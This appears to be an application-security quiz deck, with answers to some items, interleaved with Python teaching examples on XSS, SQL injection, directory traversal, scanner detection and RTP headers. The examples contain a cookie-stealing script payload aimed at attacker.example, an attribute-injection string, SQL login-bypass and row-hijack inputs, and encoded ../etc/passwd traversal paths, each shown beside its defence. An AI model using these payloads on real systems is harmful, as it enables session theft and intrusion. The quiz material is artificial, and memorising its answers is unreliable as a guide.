Deck 8: Application Security
1
When a hacker is able to take over control of a host, nearly or completely, this indicates the hacker has ________.
A) super user privileges
B) system privileges
C) Session Initiation Protocol
D) Simple Network Management Protocol
Answer: A) super user privileges
2
Among the most widespread vulnerabilities in application programs are ________ vulnerabilities.
A) operating system
B) buffer overflow
C) root
D) PHP
Answer: B) buffer overflow
3
Temporary areas in RAM are known as ________.
A) stacks
B) stack entries
C) returns
D) buffers
Answer: D) buffers
4
If an attacker enters more bytes into an area than it can accommodate, the extra is known as ________.
A) stack overflow
B) buffer overflow
C) overfiltering
D) a data buffer
5
Microsoft's web-server software is the ________.
A) XSS
B) IIS
C) IPP
D) SQL
6
What is BugTraq?
A) A vulnerability tracking service
B) A virus
C) An application that runs on Windows
D) An antivirus program
7
In Microsoft Internet Explorer, the ________ is where users begin changing their settings.
A) Tools menu
B) Action menu
C) Security tab of the Internet Options dialog box
D) Privacy tab of the Internet Options dialog box
8
A danger of website programming is accidentally allowing ________.
A) IIS
B) IPP
C) XSS
D) SQL
9
________ is when one user's input can appear on the page of another user.
A) Login screen bypass
B) Cross-site scripting
C) An SQL query
D) SQL injection
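The card above describes cross-site scripting as one user's input appearing on another user's page. The following is an added example, not part of the original deck: a guestbook renderer in Python where a comment submitted by one visitor is placed into the HTML served to every other visitor. The page templates, the comment strings and the nickname are constructed for the demonstration; `html.escape` from the standard library does the output encoding. The second pair of functions goes slightly beyond the card and shows why encoding for the HTML body is not enough inside a quoted attribute.

```python
import html

# Constructed sample input: a comment one user submitted to the guestbook.
# A <script> tag stored here runs in the browser of every later visitor.
MALICIOUS_COMMENT = (
    '<script>document.location="http://attacker.example/?c="+document.cookie</script>'
)
HARMLESS_COMMENT = 'Nice site! 1 < 2 & "quotes" are fine.'

# Hypothetical page template; {comment} is where user input lands in the HTML body.
PAGE_TEMPLATE = (
    '<html><body><h1>Guestbook</h1><div class="comment">{comment}</div></body></html>'
)


def render_vulnerable(comment: str) -> str:
    """Stored XSS: untrusted text is pasted straight into the HTML body, so the
    browser parses any markup in it, including a <script> tag another user wrote."""
    return PAGE_TEMPLATE.format(comment=comment)


def render_safe(comment: str) -> str:
    """Output encoding for the HTML body context: '<', '>', '&', '"' and "'" become
    entities, so the browser displays the text instead of interpreting it."""
    return PAGE_TEMPLATE.format(comment=html.escape(comment, quote=True))


def contains_script_tag(page: str) -> bool:
    """Check used by the demonstration: does the rendered page carry a live <script> tag?"""
    return "<script" in page.lower()


# Attribute context: the same input is placed inside a quoted attribute value.
ATTR_TEMPLATE = '<a href="/profile" title="{nick}">profile</a>'
MALICIOUS_NICK = '" onmouseover="alert(document.cookie)'


def render_attr_vulnerable(nick: str) -> str:
    """Escaping only <, > and & is not enough here: a stray double quote closes the
    title attribute and the rest of the input becomes a new event-handler attribute."""
    return ATTR_TEMPLATE.format(nick=html.escape(nick, quote=False))


def render_attr_safe(nick: str) -> str:
    """Quote characters are encoded too, so the attribute cannot be closed early."""
    return ATTR_TEMPLATE.format(nick=html.escape(nick, quote=True))


if __name__ == "__main__":
    print(render_vulnerable(MALICIOUS_COMMENT))
    print(render_safe(MALICIOUS_COMMENT))
    print(render_attr_vulnerable(MALICIOUS_NICK))
    print(render_attr_safe(MALICIOUS_NICK))
```

Encoding has to match the context the data lands in: the body-context escape in `render_safe` and the attribute-context escape in `render_attr_safe` are the minimum; data placed inside a `<script>` block or a URL needs different encoding again.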
10
________ is an attack that involves sending modified SQL statements to a web application that will, in turn, modify a database.
A) Login screen bypass
B) Cross-site scripting
C) An SQL query
D) SQL injection
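The card above defines SQL injection as modified SQL statements sent to a web application that in turn modify the database, and its distractors mention login screen bypass. The following is an added example, not part of the original deck, written in Python against an in-memory SQLite table constructed for the demonstration (the table, users and passwords are made up; passwords are kept in clear text only so the injected statement is easy to read). It shows a login query and an UPDATE that splice user input into the SQL text, the inputs that bypass the login and rewrite every row, and the parameterized versions that treat the same inputs as plain data.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory user table so the example runs offline.
    A real application stores password hashes, never clear-text passwords."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, email TEXT);
        INSERT INTO users (username, password, email) VALUES ('alice', 's3cret', 'alice@example.com');
        INSERT INTO users (username, password, email) VALUES ('bob', 'hunter2', 'bob@example.com');
        """
    )
    return conn


def login_vulnerable(conn, username, password):
    """Input is spliced into the SQL text, so a quote in the input changes the statement."""
    query = (
        "SELECT username FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameterized query: the driver passes the values separately from the SQL text,
    so the input can only ever be compared as data."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def set_email_vulnerable(conn, user_id, email):
    """Same flaw on a write: the input can rewrite the WHERE clause and hit every row."""
    conn.execute(f"UPDATE users SET email = '{email}' WHERE id = {int(user_id)}")
    conn.commit()


def set_email_safe(conn, user_id, email):
    conn.execute("UPDATE users SET email = ? WHERE id = ?", (email, int(user_id)))
    conn.commit()


def all_emails(conn):
    return [r[0] for r in conn.execute("SELECT email FROM users ORDER BY id")]


# Attack inputs. '--' starts an SQL comment, discarding the rest of the statement.
LOGIN_BYPASS = "' OR '1'='1' --"                         # password check is commented out
EMAIL_HIJACK = "evil@attacker.example' WHERE 1=1 --"    # WHERE widened to every row


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable login as:", login_vulnerable(conn, LOGIN_BYPASS, "wrong"))
    print("safe login as:      ", login_safe(conn, LOGIN_BYPASS, "wrong"))
    set_email_vulnerable(conn, 2, EMAIL_HIJACK)
    print("emails after injected UPDATE:", all_emails(conn))
```

The fix is not escaping quotes by hand; it is keeping the statement text fixed and sending values as parameters, which every mainstream database driver supports.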
11
________ is a computer language used to access and manage databases.
A) C
B) IIS
C) Ajax
D) SQL
12
________ uses multiple technologies to create dynamic client-side applications.
A) Ajax
B) C
C) IPP
D) SQL
13
A common type of buffer overflow is the stack overflow.
14
The mechanics of vulnerabilities, exploits, and patches are substantially different for operating systems and applications.
15
There are some programs that must run with root privileges.
16
It is recommended that cryptographic system protections should not be used between the user and the application.
17
An SQL statement uses the SELECT clause.
18
The dynamic nature of Ajax makes it susceptible to malicious code injection.
19
In Microsoft Windows, the native webserver program is ________.
A) Ajax
B) IIS
C) C
D) IPP
21
Apache and nginx are the two most widely used webserver programs on ________.
A) Windows 10
B) Unix
C) Linux
D) Linux and Unix
22
________ occurs when attackers take over a computer and produce false web pages.
A) Directory traversal attack
B) Mobile code
C) Cross-site scripting
D) Website defacement
23
Typing URLs with ________ in them can give access to sensitive directories.
A) ..
B) \
C) :\\
D) ::
24
With directory traversal, the path ________ would allow an attacker to download the passwd file in the etc directory (on a Unix computer).
A) /passwd
B) ../passwd
C) ../etc/passwd
D) ../root/passwd
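The two cards above cover directory traversal: `..` segments in a URL that walk out of the webserver's document root to a file such as `/etc/passwd`. The following is an added example, not part of the original deck, in Python. It models the step a webserver takes when it maps a request path onto the filesystem: a naive version that simply concatenates the document root and the decoded path, and a hardened version that decodes once, canonicalizes, and then checks that the result is still inside the root. The document root `/var/www/html` and the request paths are assumptions for the demonstration; `posixpath` is used so the behaviour is the same on any platform.

```python
import posixpath
from urllib.parse import unquote

# Assumed document root: anything under it may be served, nothing outside it.
WEBROOT = "/var/www/html"


def map_path_vulnerable(webroot: str, url_path: str) -> str:
    """Naive mapping: URL-decode the request and glue it onto the document root.
    The '..' segments are honoured by normpath, so the result can leave the root."""
    return posixpath.normpath(webroot + "/" + unquote(url_path))


def map_path_safe(webroot: str, url_path: str):
    """Decode once, canonicalize, then enforce containment in the document root.
    Returns the filesystem path, or None when the request must be rejected (HTTP 403)."""
    decoded = unquote(url_path)
    if "\x00" in decoded:                 # a NUL byte would truncate the path in a C runtime
        return None
    decoded = decoded.replace("\\", "/")  # treat Windows separators like '/'
    root = posixpath.normpath(webroot)
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    # Containment: the root itself, or a descendant of it. Checking the prefix with the
    # trailing slash matters; a bare prefix test would accept /var/www/html-private.
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


if __name__ == "__main__":
    for req in ("/images/logo.png", "/../../../etc/passwd", "/%2e%2e/%2e%2e/%2e%2e/etc/passwd"):
        print(req, "->", map_path_vulnerable(WEBROOT, req), "|", map_path_safe(WEBROOT, req))
```

Two practical caveats: decode exactly once and only before validation (a server that decodes again after the check reopens the hole through double-encoded `%252e%252e`), and on a real filesystem resolve symbolic links with `os.path.realpath` before the containment check, since a link inside the root can point outside it.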
25
What are Nikto, Paros Proxy, and Acunetix?
A) Webserver-specific vulnerability assessment tools
B) Directory traversal attackers
C) Mobile code tools
D) Website defacement tools
26
Numerous ________ errors indicate that a directory or file was not found.
A) 512
B) 500
C) 303
D) 404
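The cards above name webserver vulnerability scanners such as Nikto and note that a burst of 404 errors signals requests for directories and files that do not exist, which is what such a scanner produces when it probes a list of well-known paths. The following is an added example, not part of the original deck, in Python: it parses a handful of access-log lines in the Apache/nginx "combined" format, counts 404 responses per client, and flags clients that exceed a threshold or identify themselves with a scanner name in the User-Agent. The log lines, IP addresses and the shortened User-Agent string are constructed for the demonstration, and the threshold is an arbitrary assumption to be tuned per site.

```python
import re

# Constructed sample log in "combined" format. 198.51.100.4 is an ordinary visitor who
# hit one stale link; 203.0.113.9 walks a list of guessed paths the way a scanner does.
SAMPLE_LOG = """\
198.51.100.4 - - [10/Oct/2023:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Oct/2023:13:55:38 +0000] "GET /old-link.html HTTP/1.1" 404 196 "http://example.com/" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2023:13:55:40 +0000] "GET / HTTP/1.1" 200 5123 "-" "Mozilla/5.00 (Nikto/2.1.6)"
203.0.113.9 - - [10/Oct/2023:13:55:40 +0000] "GET /admin/ HTTP/1.1" 404 196 "-" "Mozilla/5.00 (Nikto/2.1.6)"
203.0.113.9 - - [10/Oct/2023:13:55:40 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 404 196 "-" "Mozilla/5.00 (Nikto/2.1.6)"
203.0.113.9 - - [10/Oct/2023:13:55:41 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 196 "-" "Mozilla/5.00 (Nikto/2.1.6)"
203.0.113.9 - - [10/Oct/2023:13:55:41 +0000] "GET /backup.zip HTTP/1.1" 404 196 "-" "Mozilla/5.00 (Nikto/2.1.6)"
203.0.113.9 - - [10/Oct/2023:13:55:41 +0000] "GET /.git/config HTTP/1.1" 404 196 "-" "Mozilla/5.00 (Nikto/2.1.6)"
203.0.113.9 - - [10/Oct/2023:13:55:42 +0000] "GET /wp-login.php HTTP/1.1" 404 196 "-" "Mozilla/5.00 (Nikto/2.1.6)"
"""

# One line of the combined log format: client, identd, user, time, request, status, size, referer, agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Lower-cased substrings that the deck's scanners put in their User-Agent (assumption:
# a real rule set is maintained from observed traffic, and scanners can change the string).
SCANNER_NAMES = ("nikto", "paros", "acunetix")


def parse_line(line: str):
    """Return the fields of one log line as a dict, or None if the line does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def summarize(log_text: str) -> dict:
    """Per client IP: request count, 404 count, the missing paths, and whether a scanner
    name appeared in the User-Agent."""
    stats = {}
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        s = stats.setdefault(
            rec["ip"], {"requests": 0, "not_found": 0, "missing": [], "scanner_agent": False}
        )
        s["requests"] += 1
        if rec["status"] == "404":
            s["not_found"] += 1
            s["missing"].append(rec["path"])
        if any(name in rec["agent"].lower() for name in SCANNER_NAMES):
            s["scanner_agent"] = True
    return stats


def flag_scanners(log_text: str, threshold: int = 5) -> dict:
    """Map flagged client IP -> list of reasons. The 404 threshold is an assumed value."""
    flagged = {}
    for ip, s in summarize(log_text).items():
        reasons = []
        if s["not_found"] >= threshold:
            reasons.append(f"{s['not_found']} 404s in {s['requests']} requests")
        if s["scanner_agent"]:
            reasons.append("scanner name in User-Agent")
        if reasons:
            flagged[ip] = reasons
    return flagged


if __name__ == "__main__":
    for ip, reasons in flag_scanners(SAMPLE_LOG).items():
        print(ip, "->", "; ".join(reasons))
```

The 404 count is the robust signal; the User-Agent check catches default configurations but is trivially defeated by a scanner that changes its string, so it should only add confidence, never be the sole trigger.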
27
Server-side programs should be created on ________.
A) development servers
B) testing servers
C) production servers
D) authentication servers
28
Firms with rigorous deployment policies use all of the following EXCEPT ________ for that purpose.
A) development servers
B) testing servers
C) production servers
D) authentication servers
29
After program or application creation, a program is moved to a(n) ________.
A) development server
B) testing server
C) production server
D) authentication server
30
Webserver programs often have components that come from different companies.
31
Attackers are rarely able to exploit vulnerabilities in custom programs.
32
The UNICODE coding system can represent non-English languages.
33
Websites do not typically have the ability to log responses of various error messages.
34
After a program has been fully tested, it should be moved to a production server.
35
An application proxy firewall sits between a webserver and the rest of a network.
36
________ are small programs and are probably the safest because many attack-related actions are disabled.
A) Ajaxes
B) Java applets
C) Cookies
D) Stack entries
37
________ can be used to track users at a website.
A) Stacks
B) Stack entries
C) Buffers
D) Cookies
38
Which of the following is considered quite powerful and can do almost anything on the client machine?
A) JavaScript
B) Java
C) ActiveX
D) VBScript
39
Compared to full programming languages, scripts ________.
A) are more difficult to use than programming languages like ActiveX
B) are easier to use than full programming languages
C) have similar protections to Java
D) are more difficult to use than programming languages like Java
40
Which of the following was developed by Microsoft and was said to be safe because its controls are cryptographically signed by the developer?
A) JavaScript
B) ActiveX
C) Java
D) VBScript
41
Which of the following is FALSE about cookies?
A) Some websites use cookies.
B) Antispyware programs cannot identify dangerous cookies.
C) They allow a website to track what pages you have visited.
D) Cookies can remember your login name and password to websites.
42
In the Internet Options dialog box, the ________ tab lets you select security settings for general Internet websites.
A) Privacy
B) Advanced
C) Content
D) Security
43
In the Internet Options dialog box, the ________ tab lets you control what information is released to websites.
A) Privacy
B) Advanced
C) Content
D) Security
44
Under which of the following tabs in the Internet Options dialog box are cookies controlled?
A) Privacy
B) Advanced
C) Content
D) Security
45
The more popular scripting languages for mobile code are VBScript and JavaScript.
46
Many websites require users to have ActiveX turned on.
47
What is the problem with image spam?
A) It takes up more bandwidth than traditional text spam.
B) It isn't detectable.
C) It is smaller and less detectable than traditional text spam.
D) It consumes less bandwidth and often can get past traditional spam detectors.
48
________ is considered unsolicited commercial e-mail.
A) A cookie
B) A virus
C) Spam
D) A buffer
49
SSL/TLS provides security ________.
A) between an e-mail client and its mail server
B) between an authentication email and an e-mail client
C) only with suspicious e-mail
D) at the level of the PC
50
Which of the following provides end-to-end e-mail security?
A) PKI
B) PGP
C) IIS
D) S/MIME
51
Which of the following uses circles of trust?
A) PKI
B) S/MIME
C) PGP
D) IIS
52
Many firms filter incoming e-mail messages and some filter outgoing messages as well.
53
PGP has had most success in person-to-person communication without corporate control.
54
Which of the following makes up for two of UDP's biggest weaknesses?
A) IP headers
B) UDP headers
C) RTP headers
D) Circles of trust
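The card above asks which header makes up for two of UDP's biggest weaknesses. The point behind it is that UDP gives no sequence numbers and no timing information, so the RTP header adds a 16-bit sequence number (to detect loss and reordering) and a 32-bit timestamp (to schedule playout). The following is an added example, not part of the original deck, in Python: it builds and parses the 12-byte fixed RTP header from RFC 3550 and audits a small constructed stream of G.711 PCMU packets in which one packet is lost and two arrive out of order. The packet contents, sequence numbers and SSRC are made up for the demonstration.

```python
import struct

# RFC 3550 fixed header: V/P/X/CC byte, M/PT byte, sequence (16), timestamp (32), SSRC (32).
RTP_HEADER = struct.Struct(">BBHII")


def build_rtp(seq, timestamp, ssrc, payload, payload_type=0, marker=False):
    """Serialize a version-2 RTP packet with no padding, no extension and no CSRC list."""
    b0 = 2 << 6
    b1 = (int(marker) << 7) | (payload_type & 0x7F)
    return RTP_HEADER.pack(b0, b1, seq & 0xFFFF, timestamp & 0xFFFFFFFF, ssrc) + payload


def parse_rtp(packet: bytes) -> dict:
    """Decode the fixed header, skip any CSRC entries, and return fields plus payload."""
    if len(packet) < RTP_HEADER.size:
        raise ValueError("packet shorter than the RTP fixed header")
    b0, b1, seq, timestamp, ssrc = RTP_HEADER.unpack_from(packet)
    version, cc = b0 >> 6, b0 & 0x0F
    if version != 2:
        raise ValueError(f"unsupported RTP version {version}")
    header_len = RTP_HEADER.size + 4 * cc
    return {
        "version": version,
        "padding": (b0 >> 5) & 1,
        "extension": (b0 >> 4) & 1,
        "marker": b1 >> 7,
        "payload_type": b1 & 0x7F,
        "seq": seq,
        "timestamp": timestamp,
        "ssrc": ssrc,
        "payload": packet[header_len:],
    }


def audit_stream(packets) -> dict:
    """Walk packets in arrival order. Sequence numbers (modulo 65536) reveal lost and
    reordered packets; timestamps give the order in which frames should be played out."""
    headers = [parse_rtp(p) for p in packets]
    if not headers:
        return {"lost": [], "reordered": [], "playout_order": []}
    next_expected = headers[0]["seq"]
    missing = set()          # sequence numbers passed over without being seen
    reordered = []
    for h in headers:
        delta = (h["seq"] - next_expected) & 0xFFFF   # wrap-safe distance from expected
        if delta < 0x8000:                            # at or ahead of what we expected
            for offset in range(delta):
                missing.add((next_expected + offset) & 0xFFFF)
            next_expected = (h["seq"] + 1) & 0xFFFF
        elif h["seq"] in missing:                     # behind: a late arrival we were waiting for
            missing.discard(h["seq"])
            reordered.append(h["seq"])
        # any other packet from behind is a duplicate and is ignored
    playout_order = [h["seq"] for h in sorted(headers, key=lambda h: h["timestamp"])]
    return {"lost": sorted(missing), "reordered": reordered, "playout_order": playout_order}


def constructed_stream():
    """Constructed sample: six 20 ms PCMU frames (payload type 0, 160 samples each, so the
    timestamp advances by 160 per packet), delivered with 1003 lost and 1004/1005 swapped."""
    ssrc = 0x12345678
    silence = b"\xff" * 160                             # PCMU encodes silence as 0xFF
    sent = {
        seq: build_rtp(seq, 160 * seq, ssrc, silence, payload_type=0, marker=(seq == 1000))
        for seq in range(1000, 1006)
    }
    arrival = [1000, 1001, 1002, 1005, 1004]
    return [sent[s] for s in arrival]


if __name__ == "__main__":
    print(audit_stream(constructed_stream()))
```

A receiver's jitter buffer uses exactly these two fields: the sequence number decides whether to wait for a late packet or conceal a lost one, and the timestamp decides when each frame is handed to the codec, independent of how unevenly the UDP datagrams arrived.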
55
VoIP is ________.
A) calling someone over a PSTN line
B) sending e-mail through the Internet
C) calling someone over the Internet
D) sending video over the Internet
56
When someone speaks, a(n) ________ in the VoIP phone converts the voice into a stream of digital bytes.
A) codec
B) RTP header
C) buffer
D) TCP
57
VoIP voice transmission uses ________ to carry the digital voice data.
A) UDP
B) codecs
C) buffers
D) TCP
58
Which of the following is a signaling protocol?
A) VoIP
B) SIP
C) UDP
D) RTP
59
SIP proxy servers are used primarily in ________.
A) RTP packets
B) signaling transmissions
C) transport transmissions
D) PSTN
60
In VoIP, encryption may ________.
A) increase jitter
B) reduce throughput
C) make traffic unreadable
D) increase latency
61
Spam over IP telephony is called ________.
A) RFC
B) SPIT
C) INVITE
D) VPN
62
VoIP and the PSTN use different codecs.
63
VoIP and the PSTN use different transport technology.
64
A goal of VoIP is to provide convergence.
65
Which of the following is NOT a supervisory protocol?
A) SNMP
B) ARP
C) OSPF
D) RTP
66
Presence servers allow three or more parties to locate each other.
67
Corporate IM systems should use a presence server rather than a relay server.